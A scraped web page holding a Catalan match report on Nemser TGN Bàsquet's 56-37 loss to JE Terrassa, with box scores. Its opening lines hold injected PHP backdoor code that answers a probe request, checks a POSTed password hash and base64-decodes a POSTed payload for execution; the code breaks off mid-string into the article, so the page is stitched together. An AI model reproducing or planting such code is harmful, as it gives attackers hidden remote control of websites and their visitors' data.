function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser TGN fa un partit molt fluix i perd a la pista del JET (56-37) - Tgn Bàsquet Club -

El Nemser TGN fa un partit molt fluix i perd a la pista del JET (56-37)

By
Updated: abril 6, 2014

El Nemser TGN Bàsquet va perdre a la pista de l’avantpenúltim classificat, el JE Terrassa en un partit per oblidar. El conjunt que entrena Juan Carlos Arjona es presentava al matx amb quatre baixes (Cabré, Magre, Villegas i Mari Carme Martí) però amb la confiança dels dos triomfs consecutius de les dues últimes setmanes. Amb tot, l’equip lila va fer un mal partit. Les noies del conjunt tarragoní van estar desconegudes, sense el segell d’identitat que les ha caracteritzat durant tot el curs i van ser víctima d’un rival que va anar de menys a més. El Nemser TGN Bàsquet no va defensar bé. Els duels en l’un contra un sempre van ser dominats per les jugadores locals i això va obligar a un esforç extra a les visitants. Així, la intensitat del JET va ser molt superior i es va imposar, tot i no ser un conjunt especialment alt, en la lluita pel rebot. Les pèrdues de pilota van facilitar també el joc de les locals que van anotar sovint en contraatac.

Així, tot i l’inicial domini del Nemser TGN Bàsquet, la debilitat defensiva va provocar la remuntada local. La mala defensa va propiciar, a més un atac deficient que es va manifestar en els 4 punts encistellats en el tercer període. Tot sortia malament i a la segona meitat les tarragonines no van tenir possibilitats de victòria. Les males decisions i les nombroses impresicions van facilitar la tasca del JET que finalment va aconseguir una victòria ccòmoda.

 

JE TERRASSA       56

NEMSER TGN BÀSQUET    37

JE TERRASSA: Anoucas (11), Cerezuela (8), Cerrudo (10), Garcia (12), Díaz (5) -cinc inicial- Negrebetska (5), Prunera (3), Torras, Martínez (2), Aguilera i Coma. 6 triples: Cerezuela i Garcia (2), Díaz i Negrebetska. 7/8 tirs lliures. 19 faltes. Eliminada: Garcia (40′).

NEMSER TGN BÀSQUET: G. Fort (13), O. Fort (7), Muñoz (2), Vilamajor (6), Martínez (7) -cinc inicial- Sicilia (2), Garcia, M. Martí i Gómez. 2  triples: Martínez i G. Fort. 11/12 tirs lliures. 13 faltes.

PARCIALS: 12-15, 13-9, 15-4 i 16-9.

ÀRBITRES: Berasaluce i Soler.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *